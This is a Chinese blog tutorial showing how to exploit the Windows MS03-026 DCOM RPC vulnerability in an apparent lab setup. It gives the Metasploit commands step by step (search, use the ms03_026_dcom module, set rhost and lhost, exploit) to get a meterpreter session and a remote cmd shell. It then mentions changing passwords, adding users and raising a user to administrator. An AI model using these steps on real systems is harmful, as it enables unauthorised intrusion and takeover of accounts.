欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  科技

windows漏洞MS03_026

程序员文章站 2022-05-16 07:50:39
话不多说,直接进入正题 第一步查看是否能ping通,第二步就是扫描端口,开放了端口才能进行攻击 linux进入msfconsole,搜索03_026 等待一会,返回漏洞的全名,exploit是一个攻击模块 接下来就是使用这个漏洞(在linux里复制快捷键是ctrl+shift+c,粘贴快捷键是ctr ......

话不多说,直接进入正题

第一步查看是否能ping通,第二步就是扫描端口,开放了端口才能进行攻击

linux进入msfconsole,搜索03_026

search 03_026

等待一会,返回漏洞的全名,exploit是一个攻击模块

windows漏洞MS03_026

接下来就是使用这个漏洞(在linux里复制快捷键是ctrl+shift+c,粘贴快捷键是ctrl+shift+v,这样就不用按鼠标右键点)

use exploit/windows/dcerpc/ms03_026_dcom

windows漏洞MS03_026

 显示需要配置的信息,条件

show options

windows漏洞MS03_026

只要是required一栏里,有yes的,都是必填项,第一行填的就是靶机的ip地址

set rhost 192.168.x.x

这时在设置一下攻击机的ip

set lhost 192.168.x.x

windows漏洞MS03_026

 设置完毕后,就可以进行攻击了,可用exploit或者run进行,一般都是用exploit

exploit

这时前缀就不是msf了

windows漏洞MS03_026

已经变成meterpreter,这时候输入shell

windows漏洞MS03_026

就进入到靶机的cmd里

 windows漏洞MS03_026

查看用户

linux查看

 windows漏洞MS03_026

windows查看

 windows漏洞MS03_026

可以看到,用户都是一样的,所以我们可以进行更改用户密码,还可以新建新的用户,并且还可以把普通用户提升为超级管理员

 受到03_026影响的系统有

 windows漏洞MS03_026

虽然受影响的系统都很老了,我们已经用不到了,但在现在的新系统又会有新的漏洞,只是还没有给发现,所以还是需要在日常生活中多去注意计算机的安全,要一周打一次补丁,否则哪天自己的计算机就遭殃了。